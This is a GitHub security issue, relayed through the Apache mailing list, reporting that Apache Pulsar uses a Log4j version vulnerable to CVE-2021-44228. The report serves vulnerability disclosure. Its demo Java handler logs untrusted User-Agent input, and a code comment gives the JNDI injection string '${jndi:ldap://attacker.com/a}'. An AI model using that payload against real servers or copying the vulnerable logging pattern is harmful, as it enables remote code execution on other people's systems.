[GitHub] [pulsar] HQebupt opened a new issue #13232: [security vulnerability] Remote code injection in Log4j

Fri, 10 Dec 2021 00:35:21 -0800 


HQebupt opened a new issue #13232:
URL: https://github.com/apache/pulsar/issues/13232


   **Describe the security vulnerability**
   There is a remote code injection in Apache Log4j 2.x <= 2.14.1.
   Attackers can directly construct malicious requests to trigger remote code 
execution vulnerabilities which is verified by Alibaba Cloud security team.
   
   The current Pulsar is using 2.14.0 
(`<log4j2.version>2.14.0</log4j2.version>` in pom.xml)
   Log4j versions prior to 2.15.0 are subject to a remote code execution 
vulnerability via the ldap JNDI parser. However,  it is not released yet.
   - CVE ID: CVE-2021-44228
   
   **To Reproduce**
   Steps to reproduce by following demo code.
   ```java
   public class VulnerableLog4jExampleHandler implements HttpHandler {
       static Logger log = Logger.getLogger(log4jExample.class.getName());
       /**
        * A simple HTTP endpoint that reads the request's User Agent and logs 
it back.
        *
        * This is basically pseudo-code to explain the vulnerability, and not a 
full example.
        *
        * @param he HTTP Request Object
        */
       public void handle(HttpExchange he) throws IOException {
           String userAgent = he.getRequestHeader("user-agent");
   // This line triggers the RCE by logging the attacker-controlled HTTP User 
Agent header.
   // The attacker can set their User-Agent header to: 
${jndi:ldap://attacker.com/a}
           log.info("Request User Agent:" + userAgent);
           String response = "<h1>Hello There, " + userAgent + "!</h1>";
           he.sendResponseHeaders(200, response.length());
           OutputStream os = he.getResponseBody();
           os.write(response.getBytes());
           os.close();
       }
   }
   ```
   
   **References:**
   - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
   - apache/logging-log4j2#608
   - https://github.com/tangxiaofeng7/apache-log4j-poc
   - https://logging.apache.org/log4j/2.x/changes-report.html#a2.15.0
   - https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup
   


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: [email protected]

For queries about this service, please contact Infrastructure at:
[email protected]

Reply via email to